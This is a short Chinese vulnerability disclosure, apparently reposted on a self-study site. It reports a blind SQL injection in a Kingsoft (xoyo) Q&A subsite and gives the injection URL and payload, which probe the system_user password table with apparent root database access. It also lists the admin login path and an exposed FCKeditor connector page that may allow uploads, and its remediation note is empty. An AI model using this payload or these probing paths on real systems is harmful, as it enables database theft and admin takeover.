金山某分站SQL注射+ROOT+后台 - 网站安全 - 自学p

注射点： http://ask.xoyo测试数据/index.php?act=usercenter.messageinfo&messageid={id}%20and%20exists%28select%20password%20from%20system_user%29%23 可以查询mysql.user ，应该是root权限盲注点。后台： http://ask.xoyo测试数据/admin/index.php?act=login 还存在fckeditor,估计也存在上传漏洞。 http://ask.xoyo测试数据/admin/style/js/fckeditor/editor/filemanager/connectors/test. html 具体看下图修复方案：应该懂得！

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did13866

更新时间：2022-09-13 阅读：52次